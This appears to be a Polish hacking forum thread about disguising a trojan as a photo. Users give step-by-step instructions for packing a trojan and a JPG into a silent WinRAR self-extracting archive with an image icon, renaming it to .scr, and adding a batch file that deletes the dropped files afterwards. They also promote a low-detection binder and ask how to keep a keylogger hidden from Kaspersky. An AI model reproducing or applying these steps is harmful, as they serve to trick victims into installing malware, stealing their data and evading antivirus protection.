siemano. jakby co korzystalem z opcji szukaj. wiec czy da sie tak zbindowac jpg + scr zeby oba te pliki sie odpalaly ale roszerzenie byloby scr?
siemano. jakby co korzystalem z opcji szukaj. wiec czy da sie tak zbindowac jpg + scr zeby oba te pliki sie odpalaly ale roszerzenie byloby scr?
każdy binder na to pozwala
Ja polecam TEGO bindera, dlatego że jestem jego autorem (), ma małą wykrywalność i funkcjonuje jak ma
![]()
A ja polecam to:
1. Zapakuj Rarem do archiwum SFX pliki "trojan.exe" i "fotka.jpg" oraz daj ikonkę pliku .jpg
2. Ustaw automatyczną instalacje obu plików (Setup=trojan.exe Setup=fotka.jpg)
3. Podstanie ci plik "archiwum.exe"
4. W cmd (Start->Uruchom->cmd) wpisz: "COPY archiwum.exe archiwum.scr"
Jak dla mnie to bardzo dobry sposób ;P
Powstanie plik archiwum.scr (oczywiście nazwę można zmienić) który będzie miał ikonę normalnego zdjęcia, po odpaleniu pokarze zdjęcie i niepostrzeżenie zainstaluje trojana![]()
a macie jakis binder ktorego po znidnowaniu keylgera nie wygryje mi Kaspersky ;/ macie taki binder?
a i czy to prawda ze :
wyczytalem to na jakims innym forum... i chcialbym sie dowiedziec czy to prawda ?:>"nie konicznie musi mieć rozszerzenie .exe wystarczy że zbindujemy plik .exe z plikiem .jpg oraz plikem .bat i nadamy końcówke np .jppg"[/b]
Zgadza się ale nie jest to takie proste gdysz trzeba wcześniej na komputerze ofiary dodać kilka elementów do rejestru. A jak to zrobić było już wiele razy poruszane.
Odnośnie Punktu 4 Nie Wiem Co Wpisać Wpisywałem Co Tam Pisze Oczywiście Zmieniałem Nazwę Na Swoja archiwum.exe Ale Nie Chce Mi Tego Zrobić Możesz Pomóc Wydaje Mi Sie Ze To Dobry Sposób Ale Nie Mogę Tego Zrobić Pozdro Bortex GG:1453309Originally posted by lisek160
A ja polecam to:
1. Zapakuj Rarem do archiwum SFX pliki "trojan.exe" i "fotka.jpg" oraz daj ikonkę pliku .jpg
2. Ustaw automatyczną instalacje obu plików (Setup=trojan.exe Setup=fotka.jpg)
3. Podstanie ci plik "archiwum.exe"
4. W cmd (Start->Uruchom->cmd) wpisz: "COPY archiwum.exe archiwum.scr"
Jak dla mnie to bardzo dobry sposób ;P
Powstanie plik archiwum.scr (oczywiście nazwę można zmienić) który będzie miał ikonę normalnego zdjęcia, po odpaleniu pokarze zdjęcie i niepostrzeżenie zainstaluje trojana![]()
Nie pisz mu na GG tylko napisz w tym temacie
Ja też chce wiedzieć![]()
wpiszcie w konsoli "COPY ścieszkadopliku/plik.exe szcieżkadozapisaniapliku/plik.scr
np dajecie plik archiwum.exe na dysk C: i w konsoli wpiszcie "COPY C:/archiwum.exe C:/archiwum.scr
![]()
Witam a ja mam inne pytanko , dzis zacząlem dopiero czytac se te forum i tak w ogole , wiec prosze nie atakowac mnie odrazu .A mianowicie chodzi mi o to ze spakowalem oba te pliki winrarem i podmienilem ikonki tak ze wyglada jakby to byl zwykly jpg po otworzeniu(klikajac 2 razy otwiera sie okno "samorozpakuwujace sie okno archiwum " po czym jak nacisne instaluj to all jest ok - otwiera mi sie zdjecie i to widac oraz moj maly trojanik . Problem jest jednak w tym ze chcialbym by od razu po nacisnieciu na ten plik , rozpakowal sie w tym miejscu a nie wyskakiwalo to okienko od samorozpakowywania ... ,ktos wie jak to zrobic ?Z góry thx
Originally posted by lisek160
2. Ustaw automatyczną instalacje obu plików (Setup=trojan.exe Setup=fotka.jpg)Wpisz to
Kod:Silent=1; Setup=trojan.exe; Setup=zdjęcie.jpg;![]()
oki thx zobaczete setupy juz mialem
inaczej by sie nie otworzyly ;D- po 5 min
juz sprawdzilem all dziala
thx wielkie ;D brakowalo mi tylko tej komendy silent=1;
![]()
działa tylko ze jak wlaczam plik *.scr to sie mi rozpakowuja te pliki ;/
to dodaj tam batch'a
np. takiego
no i wtedy takie komentarzeKod:echo off del fotka.jpg // usuwa fotke del plik.bat // usuwa samego siebie del trojan.exe // usuwa trojana
ja zrobiłem trojana który usuwał sam siebie i fotkę więc nie potrzebny był ten batch.Kod:Silent=1; Setup=fota.jpg; Setup=trojan.exe; Setup=plik.bat;
dalej to samo ;/ jak ustawic w sfx ustawic usuwanie pliku?